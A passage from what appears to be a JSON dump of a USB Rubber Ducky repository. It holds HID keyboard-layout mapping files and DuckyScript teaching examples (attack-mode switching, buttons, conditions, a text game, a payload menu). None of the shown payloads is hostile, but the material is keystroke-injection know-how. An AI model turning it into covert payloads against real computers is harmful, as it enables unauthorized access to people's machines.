\"09,00,00\",\n \"COMMAND-CTRL-SHIFT\": \"0B,00,00\",\n \"COMMAND-OPTION\": \"0C,00,00\",\n \"COMMAND-OPTION-SHIFT\": \"0E,00,00\",\n \"a\": \"00,00,04\",\n \"A\": \"02,00,04\",\n \"b\": \"00,00,05\",\n \"B\": \"02,00,05\",\n \"c\": \"00,00,06\",\n \"C\": \"02,00,06\",\n \"d\": \"00,00,07\",\n \"D\": \"02,00,07\",\n \"e\": \"00,00,08\",\n \"E\": \"02,00,08\",\n \"f\": \"00,00,09\",\n \"F\": \"02,00,09\",\n \"g\": \"00,00,0a\",\n \"G\": \"02,00,0a\",\n \"h\": \"00,00,0b\",\n \"H\": \"02,00,0b\",\n \"i\": \"00,00,34\",\n \"I\": \"02,00,0c\",\n \"j\": \"00,00,0d\",\n \"J\": \"02,00,0d\",\n \"k\": \"00,00,0e\",\n \"K\": \"02,00,0e\",\n \"l\": \"00,00,0f\",\n \"L\": \"02,00,0f\",\n \"m\": \"00,00,10\",\n \"M\": \"02,00,10\",\n \"n\": \"00,00,11\",\n \"N\": \"02,00,11\",\n \"o\": \"00,00,12\",\n \"O\": \"02,00,12\",\n \"p\": \"00,00,13\",\n \"P\": \"02,00,13\",\n \"q\": \"00,00,14\",\n \"Q\": \"02,00,14\",\n \"r\": \"00,00,15\",\n \"R\": \"02,00,15\",\n \"s\": \"00,00,16\",\n \"S\": \"02,00,16\",\n \"t\": \"00,00,17\",\n \"T\": \"02,00,17\",\n \"u\": \"00,00,18\",\n \"U\": \"02,00,18\",\n \"v\": \"00,00,19\",\n \"V\": \"02,00,19\",\n \"w\": \"00,00,1a\",\n \"W\": \"02,00,1a\",\n \"x\": \"00,00,1b\",\n \"X\": \"02,00,1b\",\n \"y\": \"00,00,1c\",\n \"Y\": \"02,00,1c\",\n \"z\": \"00,00,1d\",\n \"Z\": \"02,00,1d\",\n \"1\": \"00,00,1e\",\n \"!\": \"02,00,1e\",\n \"2\": \"00,00,1f\",\n \"@\": \"40,00,14\",\n \"3\": \"00,00,20\",\n \"#\": \"40,00,20\",\n \"4\": \"00,00,21\",\n \"$\": \"40,00,21\",\n \"5\": \"00,00,22\",\n \"%\": \"02,00,22\",\n \"6\": \"00,00,23\",\n \"^\": \"02,00,20\",\n \"7\": \"00,00,24\",\n \"&\": \"02,00,23\",\n \"8\": \"00,00,25\",\n \"*\": \"00,00,2d\",\n \"9\": \"00,00,26\",\n \"(\": \"02,00,25\",\n \"0\": \"00,00,27\",\n \")\": \"02,00,26\",\n \"ENTER\": \"00,00,28\",\n \"ESC\": \"00,00,29\",\n \"ESCAPE\": \"00,00,29\",\n \"BACKSPACE\": \"00,00,2a\",\n \"TAB\": \"00,00,2b\",\n \"ALT-TAB\": \"04,00,2b\",\n \"SPACE\": \"00,00,2c\",\n \" \": \"00,00,2c\",\n \"-\": \"00,00,2e\",\n \"_\": \"02,00,2e\",\n \"=\": \"02,00,27\",\n \"+\": \"02,00,21\",\n \"[\": \"40,00,25\",\n \"{\": \"40,00,24\",\n \"]\": \"40,00,26\",\n \"}\": \"40,00,27\",\n \"\\\\\": \"40,00,2d\",\n \"|\": \"40,00,2e\",\n \";\": \"02,00,31\",\n \":\": \"02,00,38\",\n \"'\": \"02,00,1f\",\n \"\\\"\": \"00,00,35\",\n \"`\": \"40,00,31\",\n \"~\": \"40,00,30\",\n \",\": \"00,00,31\",\n \"<\": \"40,00,35\",\n \".\": \"00,00,38\",\n \">\": \"40,00,1e\",\n \"/\": \"02,00,24\",\n \"?\": \"02,00,2d\",\n \"CAPSLOCK\": \"00,00,39\",\n \"F1\": \"00,00,3a\",\n \"F2\": \"00,00,3b\",\n \"F3\": \"00,00,3c\",\n \"F4\": \"00,00,3d\",\n \"F5\": \"00,00,3e\",\n \"F6\": \"00,00,3f\",\n \"F7\": \"00,00,40\",\n \"F8\": \"00,00,41\",\n \"F9\": \"00,00,42\",\n \"F10\": \"00,00,43\",\n \"F11\": \"00,00,44\",\n \"F12\": \"00,00,45\",\n \"PRINTSCREEN\":\"00,00,46\",\n \"SCROLLLOCK\": \"00,00,47\",\n \"PAUSE\": \"00,00,48\",\n \"BREAK\": \"00,00,48\",\n \"INSERT\": \"00,00,49\",\n \"HOME\": \"00,00,4a\",\n \"PAGEUP\": \"00,00,4b\",\n \"DELETE\": \"00,00,4c\",\n \"DEL\": \"00,00,4c\",\n \"END\": \"00,00,4d\",\n \"PAGEDOWN\": \"00,00,4e\",\n \"RIGHTARROW\": \"00,00,4f\",\n \"RIGHT\": \"00,00,4f\",\n \"LEFTARROW\": \"00,00,50\",\n \"LEFT\": \"00,00,50\",\n \"DOWNARROW\": \"00,00,51\",\n \"DOWN\": \"00,00,51\",\n \"UPARROW\": \"00,00,52\",\n \"UP\": \"00,00,52\",\n \"NUMLOCK\": \"00,00,53\",\n \"MENU\": \"00,00,65\",\n \"APP\": \"00,00,65\"\n}\n" }, { "path": "languages/us.json", "content": "{\n \"__comment\": \"All numbers here are in hex format and 0x is ignored.\",\n \"__comment\": \" \",\n \"__comment\": \"This list is in ascending order of 3rd byte (HID Usage ID).\",\n \"__comment\": \" See section 10 Keyboard/Keypad Page (0x07)\",\n \"__comment\": \" of document USB HID Usage Tables Version 1.12.\",\n \"__comment\": \" \",\n \"__comment\": \"Definition of these 3 bytes can be found\",\n \"__comment\": \" in section B.1 Protocol 1 (Keyboard)\",\n \"__comment\": \" of document Device Class Definition for HID Version 1.11\",\n \"__comment\": \" - byte 1: Modifier keys\",\n \"__comment\": \" - byte 2: Reserved\",\n \"__comment\": \" - byte 3: Keycode 1\",\n \"__comment\": \" \",\n \"__comment\": \"Both documents can be obtained from link here\",\n \"__comment\": \" http://www.usb.org/developers/hidpage/\",\n \"__comment\": \" \",\n \"__comment\": \"A = LeftShift + a, { = LeftShift + [\",\n \"__comment\": \" \",\n \"0\": \"00,00,27\",\n \"1\": \"00,00,1e\",\n \"2\": \"00,00,1f\",\n \"3\": \"00,00,20\",\n \"4\": \"00,00,21\",\n \"5\": \"00,00,22\",\n \"6\": \"00,00,23\",\n \"7\": \"00,00,24\",\n \"8\": \"00,00,25\",\n \"9\": \"00,00,26\",\n \"CTRL\": \"01,00,00\",\n \"CONTROL\": \"01,00,00\",\n \"SHIFT\": \"02,00,00\",\n \"ALT\": \"04,00,00\",\n \"GUI\": \"08,00,00\",\n \"WINDOWS\": \"08,00,00\",\n \"COMMAND\": \"08,00,00\",\n \"a\": \"00,00,04\",\n \"A\": \"02,00,04\",\n \"b\": \"00,00,05\",\n \"B\": \"02,00,05\",\n \"c\": \"00,00,06\",\n \"C\": \"02,00,06\",\n \"d\": \"00,00,07\",\n \"D\": \"02,00,07\",\n \"e\": \"00,00,08\",\n \"E\": \"02,00,08\",\n \"f\": \"00,00,09\",\n \"F\": \"02,00,09\",\n \"g\": \"00,00,0a\",\n \"G\": \"02,00,0a\",\n \"h\": \"00,00,0b\",\n \"H\": \"02,00,0b\",\n \"i\": \"00,00,0c\",\n \"I\": \"02,00,0c\",\n \"j\": \"00,00,0d\",\n \"J\": \"02,00,0d\",\n \"k\": \"00,00,0e\",\n \"K\": \"02,00,0e\",\n \"l\": \"00,00,0f\",\n \"L\": \"02,00,0f\",\n \"m\": \"00,00,10\",\n \"M\": \"02,00,10\",\n \"n\": \"00,00,11\",\n \"N\": \"02,00,11\",\n \"o\": \"00,00,12\",\n \"O\": \"02,00,12\",\n \"p\": \"00,00,13\",\n \"P\": \"02,00,13\",\n \"q\": \"00,00,14\",\n \"Q\": \"02,00,14\",\n \"r\": \"00,00,15\",\n \"R\": \"02,00,15\",\n \"s\": \"00,00,16\",\n \"S\": \"02,00,16\",\n \"t\": \"00,00,17\",\n \"T\": \"02,00,17\",\n \"u\": \"00,00,18\",\n \"U\": \"02,00,18\",\n \"v\": \"00,00,19\",\n \"V\": \"02,00,19\",\n \"w\": \"00,00,1a\",\n \"W\": \"02,00,1a\",\n \"x\": \"00,00,1b\",\n \"X\": \"02,00,1b\",\n \"y\": \"00,00,1c\",\n \"Y\": \"02,00,1c\",\n \"z\": \"00,00,1d\",\n \"Z\": \"02,00,1d\",\n \"!\": \"02,00,1e\",\n \"@\": \"02,00,1f\",\n \"#\": \"02,00,20\",\n \"$\": \"02,00,21\",\n \"%\": \"02,00,22\",\n \"^\": \"02,00,23\",\n \"&\": \"02,00,24\",\n \"*\": \"02,00,25\",\n \"(\": \"02,00,26\",\n \")\": \"02,00,27\",\n \"ENTER\": \"00,00,28\",\n \"ESC\": \"00,00,29\",\n \"ESCAPE\": \"00,00,29\",\n \"BACKSPACE\": \"00,00,2a\",\n \"TAB\": \"00,00,2b\",\n \"SPACE\": \"00,00,2c\",\n \" \": \"00,00,2c\",\n \"-\": \"00,00,2d\",\n \"_\": \"02,00,2d\",\n \"=\": \"00,00,2e\",\n \"+\": \"02,00,2e\",\n \"[\": \"00,00,2f\",\n \"{\": \"02,00,2f\",\n \"]\": \"00,00,30\",\n \"}\": \"02,00,30\",\n \"\\\\\": \"00,00,31\",\n \"|\": \"02,00,31\",\n \";\": \"00,00,33\",\n \":\": \"02,00,33\",\n \"'\": \"00,00,34\",\n \"\\\"\": \"02,00,34\",\n \"`\": \"00,00,35\",\n \"~\": \"02,00,35\",\n \",\": \"00,00,36\",\n \"<\": \"02,00,36\",\n \".\": \"00,00,37\",\n \">\": \"02,00,37\",\n \"/\": \"00,00,38\",\n \"?\": \"02,00,38\",\n \"CAPSLOCK\": \"00,00,39\",\n \"F1\": \"00,00,3a\",\n \"F2\": \"00,00,3b\",\n \"F3\": \"00,00,3c\",\n \"F4\": \"00,00,3d\",\n \"F5\": \"00,00,3e\",\n \"F6\": \"00,00,3f\",\n \"F7\": \"00,00,40\",\n \"F8\": \"00,00,41\",\n \"F9\": \"00,00,42\",\n \"F10\": \"00,00,43\",\n \"F11\": \"00,00,44\",\n \"F12\": \"00,00,45\",\n \"PRINTSCREEN\": \"00,00,46\",\n \"SCROLLLOCK\": \"00,00,47\",\n \"PAUSE\": \"00,00,48\",\n \"BREAK\": \"00,00,48\",\n \"INSERT\": \"00,00,49\",\n \"HOME\": \"00,00,4a\",\n \"PAGEUP\": \"00,00,4b\",\n \"DELETE\": \"00,00,4c\",\n \"DEL\": \"00,00,4c\",\n \"END\": \"00,00,4d\",\n \"PAGEDOWN\": \"00,00,4e\",\n \"RIGHTARROW\": \"00,00,4f\",\n \"RIGHT\": \"00,00,4f\",\n \"LEFTARROW\": \"00,00,50\",\n \"LEFT\": \"00,00,50\",\n \"DOWNARROW\": \"00,00,51\",\n \"DOWN\": \"00,00,51\",\n \"UPARROW\": \"00,00,52\",\n \"UP\": \"00,00,52\",\n \"NUMLOCK\": \"00,00,53\",\n \"MENU\": \"00,00,65\",\n \"APP\": \"00,00,65\"\n}\n" }, { "path": "payloads/examples/ATTACKMODE/ATTACKMODE-example1.txt", "content": "REM The ATTACKMODE command may be used multiple times throughout a payload.\rREM Changing the attack mode will cause the target to re-enumerate the device.\r\rATTACKMODE HID\rDELAY 2000\rSTRINGLN The USB Rubber Ducky is functioning as a keyboard.\rSTRINGLN It will function as a flash drive for the next 30 seconds.\rATTACKMODE STORAGE\rDELAY 30000\rATTACKMODE HID\rDELAY 2000\rSTRINGLN Now the USB Rubber Ducky is back to functioning as only a keyboard.\rSTRINGLN For the next 30 seconds it will function as both keyboard and storage.\rATTACKMODE HID STORAGE\rDELAY 30000\rSTRINGLN Now the USB Rubber Ducky will disable itself.\rATTACKMODE OFF\r\rREM This payload will begin by enumerating as a HID keyboard.\rREM The USB Rubber Ducky will then enumerate as a mass storage \"flash drive\" for 30 seconds.\rREM Once more it will be enumerated as only a HID keyboard.\rREM Next it will enumerate as both a HID keyboard and a mass storage \"flash drive\".\rREM Finally, the device will seem to be disconnected." }, { "path": "payloads/examples/ATTACKMODE/ATTACKMODE-example2.txt", "content": "REM Within a payload the ATTACKMODE command may be executed multiple times.\rREM In some situations it can be useful to \"remember\" an ATTACKMODE state, for later recall.\rREM The SAVE_ATTACKMODE command will save the currently running ATTACKMODE state (including any specified VID, PID, MAN, PROD and SERIAL parameters) such that it may be later restored.\rREM The RESTORE_ATTACKMODE command will restore a previously saved ATTACKMODE state.\r\r\rATTACKMODE HID STORAGE VID_05AC PID_021E MAN_HAK5 PROD_DUCKY SERIAL_1337\r\rBUTTON_DEF\r RESTORE_ATTACKMODE\r STRINGLN The ATTACKMODE has been restored.\rEND_BUTTON\r\rSTRING The USB Rubber Ducky is now in\rSTRINGLN an ATTACKMODE HID STORAGE.\rSAVE_ATTACKMODE\r\rSTRINGLN This state has been saved. \rSTRINGLN Now entering ATTACKMODE OFF...\rSTRING Press the button to restore \rSTRINGLN the ATTACKMODE.\rATTACKMODE OFF\n\n\nREM The USB Rubber Ducky will be recognized as a composite USB device with both HID and STORAGE features.\rREM Strings will be typed informing the user of the save state, the button functionality, and entering ATTACKMODE OFF.\rREM Pressing the button will restore the previously initialized ATTACKMODE." }, { "path": "payloads/examples/Button/Button-example1.txt", "content": "REM WAIT_FOR_BUTTON_PRESS halts payload execution until a button press is detected.\rREM When this command is reached in the payload, no further execution will occur. The button definition (either set using BUTTON_DEF or the arming-mode default) will be suppressed.\r\rSTRING Press the button...\rWAIT_FOR_BUTTON_PRESS\rSTRING The button was pressed!\r\rREM The text \"The button was pressed!\" will not be typed until the button is pressed.\r" }, { "path": "payloads/examples/Button/Button-example2.txt", "content": "STRING Press the button 3 times...\rWAIT_FOR_BUTTON_PRESS\rSTRING 1...\rWAIT_FOR_BUTTON_PRESS\rSTRING 2...\rWAIT_FOR_BUTTON_PRESS\rSTRING 3... You did it!\r\r\rREM The button must be pressed 3 times to complete the payload.\r" }, { "path": "payloads/examples/Button/Button-example3.txt", "content": "LED_R\rREM First Stage Payload Code...\rREM Wait for operator to assess target \rREM before executing second stage.\rWAIT_FOR_BUTTON_PRESS\rLED_G\rREM Second Stage Payload Code...\r\rREM The operator is instructed to press the button as soon as the target is ready for the next stage.\rREM The LED command is used to indicate to the operator that the payload is waiting for a button press." }, { "path": "payloads/examples/Button/Button-example4.txt", "content": "REM BUTTON_DEF defines a function which will execute when the button is pressed anytime within the payload so long as the button control is not already in use by the WAIT_FOR_BUTTON_PRESS command or other such function.\nREM By default, if no button definition (BUTTON_DEF) is included in the payload, the button will stop all further payload execution and invoke ATTACKMODE STORAGE — entering the USB Rubber Ducky into arming mode.\nREM Similar to functions (described later), which begin with FUNCTION NAME() and with END_FUNCTION, the button definition begins with BUTTON_DEF and ends with END_BUTTON.\n\nBUTTON_DEF\n STRING The button was pressed!\n STOP_PAYLOAD\nEND_BUTTON\n\nWHILE TRUE\n STRING .\n DELAY 1000\nEND_WHILE\n\n\nREM The payload will type a period every second until the button is pressed. \nREM Once the button is pressed, the payload will type the text “The button was pressed!”\nREM After the button press text is typed, the payload will terminate.\n" }, { "path": "payloads/examples/Button/Button-example5.txt", "content": "BUTTON_DEF\n WHILE TRUE\n LED_R\n DELAY 1000\n LED_OFF\n DELAY 1000\n END_WHILE\nEND_BUTTON\n\nSTRING Press the button at any point to blink the LED red\nWHILE TRUE\n STRING .\n DELAY 1000\nEND_WHILE\n\nREM If the button is pressed at any point in the payload it will stop typing “.” and the LED will start blink red until the device is unplugged.\n" }, { "path": "payloads/examples/Button/Button-example6.txt", "content": "BUTTON_DEF\n REM This is the first button definition\n STRINGLN The button was pressed once!\n BUTTON_DEF\n REM This second button definition \n REM overwrites the first\n STRINGLN The button was pressed twice!\n END_BUTTON\nEND_BUTTON\n\nSTRING Press the button twice to see\nSTRING how nested button definitions work!\nENTER\n\nWHILE TRUE\n STRING .\n DELAY 1000\nEND_WHILE\n\n\nREM If the button is pressed once at any point in the payload it will stop typing “.” and the first button definition will be executed.\nREM When the first button definition is executed, a secondary button definition will be implemented.\nREM If the button pressed a second time, the newly implement second button definition will execute.\n" }, { "path": "payloads/examples/Button/Button-example7.txt", "content": "REM The DISABLE_BUTTON command prevents the button from calling the BUTTON_DEF. \n\nBUTTON_DEF\n STRING This will never execute\nEND_BUTTON\n\nDISABLE_BUTTON\n\nSTRING The button is disabled\nWHILE TRUE\n STRING .\n DELAY 1000\nEND_WHILE\n\n\nREM The DISABLE_BUTTON command disables the BUTTON_DEF.\nREM The button definition which types \"This will never execute\", will never execute — even if the button is pressed.\n" }, { "path": "payloads/examples/Button/Button-example8.txt", "content": "ATTACKMODE OFF\nLED_OFF\nDISABLE_BUTTON\n\nREM The USB Rubber Ducky will be effectively disabled.\n" }, { "path": "payloads/examples/Button/Button-example9.txt", "content": "REM The ENABLE_BUTTON command allows pressing the button to call the BUTTON_DEF. \r\rBUTTON_DEF\r STRINGLN The button was pressed!\r STRINGLN Continuing the payload...\rEND_BUTTON\r\rWHILE TRUE\r DISABLE_BUTTON\r STRING The button is disabled for the next \r STRINGLN 5 seconds...\r STRINGLN Pressing the button will do nothing...\r DELAY 5000\r \r ENABLE_BUTTON\r STRING The button is enabled for the next \r STRINGLN 5 seconds...\r STRING Pressing the button will execute \r STRINGLN the button definition...\r DELAY 5000\rEND_WHILE\r\rREM The payload will alternate between the button being enabled and disabled.\rREM If the button is pressed within the 5 second disabled window, nothing will happen.\rREM If the button is pressed within the 5 second enabled window, the button definition will be executed and \"The button was pressed!\" will be typed.\rREM The payload will loop forever." }, { "path": "payloads/examples/Conditions/Conditions-example1.txt", "content": "REM The flow control statement IF will determine whether or not to execute its block of code based on the evaluation of an expression. One way to interpret an IF statement is to read it as \"IF this condition is true, THEN do this\".\r\rREM The IF statement consists of these parts\rREM - The IF keyword\rREM - The condition, or expression that evaluates to TRUE or FALSE\rREM - In most cases, the expression is surrounded by parenthesis ( )\rREM - The THEN keyword\rREM - One or more newlines containing the block of code to execute\rREM - The END_IF keyword\r\rREM Example IF THEN\r\r$FOO = 42\r$BAR = 1337\r\rIF ( $FOO < $BAR ) THEN\r STRING 42 is less than 1337\rEND_IF\r\rREM The expression \"Is 42 less than 1337\" is evaluated and determined to be TRUE.\rREM Because the IF condition is TRUE, the code between the keywords THEN and END_IF are executed.\rREM The string \"42 is less than 1337\" is typed." }, { "path": "payloads/examples/Conditions/Conditions-example2.txt", "content": "REM The ELSE statement is an optional component of the IF statement which will only execute when the IF statement condition is FALSE. One way to interpret an ELSE statement is to read it as \"IF this condition is true, THEN do this thing, or ELSE do another thing\".\r\r\rREM Example IF THEN ELSE\r\rIF ( $_CAPSLOCK_ON == TRUE ) THEN\r STRING Capslock is on!\rELSE IF ( $_CAPSLOCK_ON == FALSE ) THEN\r STRING Capslock is off!\rEND_IF\r\r\rREM The condition of the capslock key, as determined by the target operating system, is checked.\rREM If the caps lock key state has been reported by the target as ON, the string \"Capslock is on\" will be typed.\rREM Otherwise, if the capslock key state has not been reported by the target (or it has been reported as not being on), the string \"Capslock is off\" will be typed." }, { "path": "payloads/examples/Conditions/Conditions-example3.txt", "content": "REM A nested IF statement is quite simply an IF statement placed inside another IF statement. Nested IF statements may be used when evaluating a combination of conditions.\r\r\rREM Example nested IF statements\r\rIF ( $_CAPSLOCK_ON == TRUE ) THEN\r IF ( $_NUMLOCK_ON == TRUE ) THEN\r STRING Both Capslock and Numlock are on!\r END_IF\rEND_IF\r\r\rREM The condition of the first IF statement is evaluated — whether or not the target has reported that the caps lock key is on. If it is TRUE, then the nested IF statement will run.\n\rREM The second IF statement is evaluated much like the first, only this time checking the status of the num lock key.\n\rREM If both the capslock and numlock keys have been reported by the target as being on, then the string \"Both Capslock and Numlock are on!\" will be typed." }, { "path": "payloads/examples/Conditions/Conditions-example4.txt", "content": "REM In some cases it may be more efficient to use logical operators within a single IF statement, rather than using a nested IF structure. \r\r\rREM Example IF statement with logical operators\r\rIF (( $_CAPSLOCK_ON == TRUE ) && ( $_NUMLOCK_ON == TRUE )) THEN\r STRING Both Capslock and Numlock are on!\rEND_IF\r\r\rREM Because the AND logical operator is in use, the whole condition will only evaluate as TRUE if both sub conditions are TRUE.\n\rREM Similar to the Nested IF example, the string \"Both Capslock and Numlock are on!\" will only be typed if both capslock and numlock are reported by the target as being on.\r" }, { "path": "payloads/examples/Conditions/Conditions-example5.txt", "content": "REM The syntax of IF states that in nearly all cases the expression should be surrounded by parenthesis ( ) — however there is an exception to this rule. \rREM If the condition of only one variable is true or false, the parenthesis may be omitted. This results in a slightly smaller encoded inject.bin file as well as slightly faster payload execution. This is because it removes the step of first reducing the order precedence.\r\rREM Example of optimized and unoptimized IF statements\rREM Consider\rVAR $FLAG = TRUE\r\rIF $FLAG THEN\r STRING FLAG is TRUE\rEND_IF\r\rREM versus\r\rIF ( $FLAG == TRUE ) THEN\r STRING FLAG is TRUE\rEND_IF\r\r\rREM In the first example, the IF statement without the parenthesis results in a 6 bytes added to the compiled inject.bin file.\nREM In the second example, the IF statement surrounded by parenthesis results in 16 bytes added to the compiled inject.bin file.\r" }, { "path": "payloads/examples/Conditions/Conditions-example6.txt", "content": "REM Example of optimized IF statement \rREM with internal variable\r\rIF $_CAPSLOCK_ON THEN\r STRINGLN The caps lock key is on\rEND_IF\r\r\rREM The internal variable $_CAPSLOCK_ON is checked. \nREM If it evaluates as TRUE, the message “The caps lock key is on” is typed." }, { "path": "payloads/examples/Example_Payloads/konami_cave.txt", "content": "REM Boots as STORAGE, starts a game of cave in a text editor after konami code \nREM COMPATABILITY: \nREM DuckyScript 3.0\n\nREM TARGET:\nREM Any host that will reflect CAPSLOCK\n\nREM DEPLOYMENT:\nREM Plug in Ducky. To Start a game of cave:\nREM Open PayloadStudio Console, notepad or text editor, make sure cursor is active there\nREM Press the button on the Ducky\nREM Press CAPSLOCK on the host machine lock 5 times\nREM Press the Duck button to confirm and start game\nREM Good luck!\n\nATTACKMODE STORAGE\nLED_G\nWAIT_FOR_BUTTON_PRESS\nLED_OFF\nATTACKMODE HID STORAGE\nLED_G\nWAIT_FOR_CAPS_CHANGE\nLED_OFF\nWAIT_FOR_CAPS_CHANGE\nLED_G\nWAIT_FOR_CAPS_CHANGE\nLED_OFF\nWAIT_FOR_CAPS_CHANGE\nLED_G\nWAIT_FOR_CAPS_CHANGE\nLED_R\nWAIT_FOR_BUTTON_PRESS\nLED_G\n\nDEFINE RIGHT 0\nDEFINE LEFT 1\nDEFINE GAME_MAX_WIDTH 40\nDEFINE GAME_SPEED 200 \nVAR $mode = RIGHT\nVAR $lock_state = FALSE\nVAR $score = 0\nVAR $running = TRUE\nVAR $direction_changes = 0\n\nVAR $D = 0\nVAR $INPUT = 0\nVAR $MOD = 0\nVAR $P = FALSE\nFUNCTION PRINTDIGIT()\n IF ($D == 0) THEN\n STRING 0\n ELSE IF ($D == 1) THEN\n STRING 1\n ELSE IF ($D == 2) THEN\n STRING 2\n ELSE IF ($D == 3) THEN\n STRING 3\n ELSE IF ($D == 4) THEN\n STRING 4\n ELSE IF ($D == 5) THEN\n STRING 5\n ELSE IF ($D == 6) THEN\n STRING 6\n ELSE IF ($D == 7) THEN\n STRING 7\n ELSE IF ($D == 8) THEN\n STRING 8\n ELSE IF ($D == 9) THEN\n STRING 9\n ELSE \n STRING ?\n END_IF\nEND_FUNCTION\nFUNCTION CONSUME()\n $D = 0\n WHILE ($INPUT >= $MOD)\n $D = ($D + 1)\n $INPUT = ($INPUT - $MOD)\n END_WHILE\n IF (($D > 0) || ($P == TRUE)) THEN\n $P = TRUE\n PRINTDIGIT()\n END_IF\nEND_FUNCTION\nFUNCTION TRANSLATE_INT() \n $P = FALSE\n IF ( $INPUT >= 10000) THEN\n $MOD = 10000\n CONSUME()\n END_IF\n IF (($INPUT >= 1000) || ($P == TRUE)) THEN\n $MOD = 1000\n CONSUME()\n END_IF\n IF (($INPUT >= 100) || ($P == TRUE)) THEN\n $MOD = 100\n CONSUME()\n END_IF\n IF (($INPUT >= 10) || ($P == TRUE)) THEN\n $MOD = 10\n CONSUME()\n END_IF()\n $D = $INPUT\n PRINTDIGIT()\n ENTER\nEND_FUNCTION\nFUNCTION TRANSLATE_BOOL()\n IF ($INPUT == TRUE) THEN\n STRING TRUE\n ELSE IF ($INPUT == FALSE) THEN\n STRING FALSE\n ELSE \n STRING ?\n END_IF\n ENTER\nEND_FUNCTION\n\nVAR $CD = 3\nFUNCTION COUNTDOWN()\n\tWHILE ( $CD > 0 )\n\t\tSTRING .\n\t\t$CD = ($CD - 1)\n\t\tDELAY 1000\n\tEND_WHILE\nEND_FUNCTION\n\nFUNCTION ENSURE_CAPS_OFF()\n\tIF ($_CAPSLOCK_ON == TRUE) THEN\n\t\tCAPSLOCK\n\tEND_IF\nEND_FUNCTION\n\nFUNCTION init() \n $_RANDOM_MIN = 9\n $_RANDOM_MAX = 19\n VAR $l_wall = $_RANDOM_INT\n $_RANDOM_MIN = 20 \n $_RANDOM_MAX = 29\n VAR $player = $_RANDOM_INT\n $_RANDOM_MIN = 30\n $_RANDOM_MAX = 40\n VAR $r_wall = $_RANDOM_INT\nEND_FUNCTION\n\nFUNCTION check_input()\n VAR $changed = FALSE\n IF ($_CAPSLOCK_ON != $lock_state) THEN\n $lock_state = $_CAPSLOCK_ON\n \t$direction_changes = ($direction_changes + 1)\n IF ($mode == RIGHT) THEN\n $mode = LEFT\n ELSE\n $mode = RIGHT\n END_IF\n END_IF\nEND_FUNCTION\n\nFUNCTION end_game()\n LED_R\n $running = FALSE\nEND_FUNCTION\n\nFUNCTION move_walls()\n $_RANDOM_MIN = 0\n $_RANDOM_MAX = 100\n VAR $CHANCE = $_RANDOM_INT\n\n IF ($CHANCE > 45) THEN\n IF ($l_wall < GAME_MAX_WIDTH) THEN\n $l_wall = ($l_wall + 1)\n REM STRING l+\n END_IF\n ELSE\n IF ($l_wall > 0) THEN\n $l_wall = ($l_wall - 1)\n REM STRING l-\n ELSE\n $l_wall = ($l_wall + 1)\n END_IF\n END_IF\n\n $CHANCE = $_RANDOM_INT\n IF ($CHANCE > 45) THEN\n IF ($r_wall > 0) THEN\n $r_wall = ($r_wall - 1)\n REM STRING r-\n END_IF\n ELSE\n IF ($r_wall < GAME_MAX_WIDTH) THEN\n $r_wall = ($r_wall + 1)\n REM STRING r+\n ELSE\n $r_wall = ($r_wall - 1)\n END_IF\n END_IF\n REM ENTER\nEND_FUNCTION\n\nFUNCTION move_player()\n IF ($mode == RIGHT) THEN\n IF ($player < GAME_MAX_WIDTH) THEN\n $player = ($player + 1)\n END_IF\n ELSE IF ($mode == LEFT) THEN\n IF ($player > 0) THEN\n $player = ($player - 1)\n END_IF\n END_IF\nEND_FUNCTION\n\nFUNCTION draw()\n\tIF (($player <= $l_wall) || ($player >= $r_wall)) THEN\n\t\tend_game()\n STRING BONK\n RETURN 0\n END_IF\n\n VAR $l_inside_whitespace = (($player - $l_wall) - 1)\n VAR $r_inside_whitespace = (($r_wall - $player) - 1)\n IF ($l_wall > 1) THEN\n VAR $l_outside_whitespace = ($l_wall - 1)\n WHILE ($l_outside_whitespace > 0)\n SPACE\n $l_outside_whitespace = ($l_outside_whitespace - 1)\n END_WHILE\n END_IF \n STRING |\n WHILE ($l_inside_whitespace > 0)\n SPACE\n $l_inside_whitespace = ($l_inside_whitespace - 1)\n END_WHILE\n IF ($mode == RIGHT) THEN\n STRING >\n ELSE IF ($mode == LEFT) THEN\n STRING <\n END_IF\n WHILE ($r_inside_whitespace > 0)\n SPACE\n $r_inside_whitespace = ($r_inside_whitespace - 1)\n END_WHILE\n STRING |\n ENTER\n $score = ($score + 1)\n RETURN 0\nEND_FUNCTION\n\nFUNCTION run()\n check_input()\n move_walls()\n check_input()\n move_player()\n check_input()\n draw()\nEND_FUNCTION\n\nFUNCTION play_cave()\n\tWHILE TRUE\n\t\tENSURE_CAPS_OFF()\n\t\t$score = 0\n\t\tLED_G\n\t\tENTER\n\t \tSTRING Game Starting in 3s\n\t\t$CD = 3\n\t\tCOUNTDOWN()\n\t\tENTER\n\t\tSTRING GOOD LUCK!\n\t\tENTER\n\t\tENTER\n\t init()\n\t WHILE ($running == TRUE) \n\t DELAY GAME_SPEED\n\t run()\n\t END_WHILE\n\t\tENSURE_CAPS_OFF()\n\t\tENTER\n\t\tSTRING Left wall \n\t\t$INPUT = $l_wall\n\t\tTRANSLATE_INT()\n\t\tSTRING Right wall:\n\t\t$INPUT = $r_wall\n\t\tTRANSLATE_INT()\n\t\tSTRING Player position:\n\t\t$INPUT = $player\n\t\tTRANSLATE_INT()\n\t\tSTRING GAME OVER. SCORE: \n\t\t$INPUT = $score\n\t\tTRANSLATE_INT()\n\t\tSTRING Player Moves: \n\t\t$INPUT = $direction_changes\n\t\tTRANSLATE_INT()\n\t\tDELAY 1000\n\t\tSTRING Press CAPS to play again.\n\t\tWAIT_FOR_CAPS_CHANGE\n\t\t$running = TRUE\n\t\tDELAY 100\n END_WHILE \nEND_FUNCTION\n\nBUTTON_DEF\n\tend_game()\nEND_BUTTON\n\nplay_cave()" }, { "path": "payloads/examples/Example_Payloads/payload_menu.txt", "content": "REM Example Injection/Text Based Payload selection\nREM COMPATABILITY: \nREM DuckyScript 3.0\n\nREM TARGET:\nREM Any host that will reflect NUMLOCK\n\nREM USAGE:\nREM Replace the Hello Payload 1/2/3 stubs below with payloads of your choice. \n\nREM DEPLOYMENT:\nREM Open PayloadStudio Console, notepad or text editor, make sure cursor is active there\nREM Plug in Ducky\nREM Hit NUMLOCK on the host machine to cycle through modes\nREM Hit the button on the Ducky to confirm current selection\nREM Replace Example Modes with desired payloads - marked via comments below\n\nDELAY 1000\nVAR $SELECTED = 0\nDEFINE MODE_MAX 2\nDEFINE MODE_1 0\nDEFINE MODE_2 1\nDEFINE MODE_3 2\n\nFUNCTION inc_mode()\n\tIF ($SELECTED == MODE_MAX) THEN\n\t\t$SELECTED = 0\n\tELSE\n\t\t$SELECTED = ($SELECTED + 